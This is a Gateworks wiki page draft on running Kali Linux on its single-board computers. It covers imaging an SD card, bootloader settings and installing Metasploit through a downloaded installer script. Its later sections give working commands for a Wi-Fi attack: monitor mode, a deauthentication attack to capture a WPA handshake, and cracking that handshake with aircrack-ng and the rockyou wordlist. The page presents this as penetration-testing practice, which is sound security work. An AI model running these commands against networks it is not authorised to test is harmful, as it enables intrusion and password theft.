Changes between Initial Version and Version 1 of Kali

07/06/2021 11:30:16 PM (17 months ago)
Cale Collins

first draft, no pics


  • Kali

    v1 v1  
     1= Kali
     3Offical Kali Linux images are now provided by [ Offensive Security] for both Ventana and Newport. 
     5Build-scripts can be found here:
     7* [ Ventana]
     8* [ Newport]
     9* Create your own - [ kali-linux-arm-chroot]
     11The Ventana prebuilt image can be downloaded from [ here], ARM images > Gateworks. 
     13** Note:  Offical images use Gateworks kernel repos. ** 
     15== What is Kali
     17Kali Linux (formerly known as !BackTrack Linux) is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering. Kali Linux is a multi platform solution, accessible and freely available to information security professionals and hobbyists.
     19Kali Linux was released on the 13th March 2013 as a complete, top-to-bottom rebuild of !BackTrack Linux, adhering completely to Debian development standards.
     21Reference: []
     23= Kali on Gateworks
     25Official instructions:
     27* [ Official Page]
     29The following instructions can be used on Ventana or Newport family boards.
     32* 16GB SD card or larger (Class 10 recommended)
     33* Gateworks SBC Ventana or Newport
     34* Linux Desktop Workstation
     35* Wireless radio capable of packet injection ([wiki:/wireless/wifi#Wifi-6 Alfa AWPCIE-AX200U] recommended)
     36* Antennas
     39== Installing Kali to an SD card
     41Insert SD card into Linux workstation, then use"dmesg" to check the device name udev has assigned, for example "/dev/sdb". 
     43Some operating systems will auto-mount block storage devices, the partitions must be unmounted in order to write directly to the volume:
     45umount /dev/sdb?
     48Write image to SD card:
     51xzcat kali-linux-1-newport.img.xz |sudo dd of=/dev/sdb bs=4M status=progress
     54The card is now imaged with Kali.  Because the partitions have already been unmounted, simply remove the card. 
     57== Booting the SD card
     59To boot from the SD card reader on the Gateworks "boot_targets", or "bootdevs" need to be set so the SD card has priority over the flash. 
     61Break out in the bootloader:
     63For Newport:
     65GW6204-B> setenv boot_targets mmc1 mmc0 usb0 scsi0
     66GW6204-B> saveenv
     69For Ventana:
     71Ventana > setenv bootdevs mmc
     72Ventana > print bootdevs     
     74Ventana > saveenv
     75Saving Environment to NAND...
     76Erasing NAND...
     77Erasing at 0x1000000 -- 100% complete.
     78Writing to NAND... OK
     79Ventana >
     82Reboot the SBC.
     84Once Kali is loaded login, username "kali", password "kali".
     86Verify that your network interfaces are available:
     89ls /sys/class/net
     92Check your radio is capable of working on the channels that will be exploited:
     94iw phy phy0 channels
     96= Install Metasploit Framework
     98Metasploit framework is an open source tool which can be used to probe systematic vulnerabilities on networks and servers.
     100Metasplot features:
     101* Command shell payloads that enable users to run scripts or random commands against a host
     102* Dynamic payloads that allow testers to generate unique payloads to evade antivirus software
     103* Meterpreter payloads that allow users to commandeer device monitors using VMC and to take over sessions or upload and download files
     104* Static payloads that enable port forwarding and communications between networks
     106Offensive-Security offers a free online course for learning Metasploit: []
     108To install Metasploit on Gateworks:
     1101. Update your system
     112apt-get update
     1141. Install curl
     116sudo apt-get install curl -y
     1181. Download and install Metasploit
     120curl > msfinstall && \
     121  chmod 755 msfinstall && \
     122  ./msfinstall
     125= Aircrack-ng
     127Aircrack-ng is a complete suite of tools to assess !WiFi network security.
     129It focuses on different areas of !WiFi security:
     130* Monitoring: Packet capture and export of data to text files for further processing by third party tools
     131* Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
     132* Testing: Checking !WiFi cards and driver capabilities (capture and injection)
     133* Cracking: WEP and WPA PSK (WPA 1 and 2)
     135Reference: []
     137For deauthentication the wifi adapter will need to be capable of packet injection. 
     139To test if packet injection is available:
     141sudo aireplay-ng --test wlan0mon
     144== Capturing packets
     146In order to capture packets airmon-ng is used to create a monitor interface. 
     148To begin connect to the board using SSH (this is important later).
     150Kill processes that may interfere with airmon-ng:
     152sudo airmon-ng check kill
     154Start the monitor interface:
     156sudo airmon-ng start wlan0 #this command creates the "mon" interface "wlan0mon".
     158Kick off airodump-ng to start capturing packets. Note, airodump-ng by default will only monitor on 2.4Ghz, use the "--band a" switch to enable 5ghz monitoring. 
     160sudo airodump-ng --band a wlan0mon
     163== Hacking the Gibson
     165Once the target SSID has been identified record its MAC address, also note which channel it's on. 
     167Single out that network to find clients which can be deauthenticated.  In this example my BSSID is {{{11:22:33:44:55:66}}} on channel 44.  We will create a log file to record the handshake called "my-handshake".
     169sudo airodump-ng -c44 --write my-handshake --bssid 11:22:33:44:55:66 wlan0mon
     171Run this scan until a client is identified.  For this example I've used my cell phone MAC {{{77:88:99:AA:BB:CC}}}.
     173Start a new SSH session, so both sessions are open simultaneously. 
     175In the second session execute your deauthentication attack (this is where packet injection is used):
     177sudo aireplay-ng --deauth 0 -a 11:22:33:44:55:66 -c 77:88:99:AA:BB:CC wlan0mon
     179Upon sucess the client is disconnected from the access point.  When the client reconnects airodump-ng will capture the handshake and log it to the designated file. 
     181=== Wordlists and Aircrack-ng
     183Wordlists with default manufacturer passwords are provided by Metasploit framework.  More wordlists can be found in "/usr/share/wordlists".  A wordlist is only one potential approach to breaking the handshake hash.  Because it is the most simple we will use this method in the following example. 
     185An all around basic wordlist included with Kali is rockyou.txt.
     187sudo gunzip /usr/share/wordlists/rockyou.txt.gz #extract the wordlist
     188cat /usr/share/wordlists/rockyou.txt #display words contained in the list
     190Kick off aircrack-ng to decrypt the hash:
     192aircrack-ng my-handshake-01.cap -w /usr/share/wordlists/rockyou.txt
     195= Getting help with Kali
     197Please direct all Kali Linux related questions to the forums:
     201Feel welcome to contact ! for questions specific to Gateworks.